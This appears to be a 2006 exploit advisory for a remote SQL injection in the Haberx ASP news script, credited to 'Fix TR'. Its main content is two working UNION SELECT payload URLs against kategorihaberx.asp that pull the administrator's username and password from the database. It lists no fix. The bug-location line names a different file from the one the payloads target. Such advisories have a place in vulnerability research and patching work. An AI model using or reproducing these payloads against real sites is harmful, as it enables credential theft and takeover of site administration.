Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability

2006-09-15 00:00:00

+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In : kategorix.asp
+ Risk : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.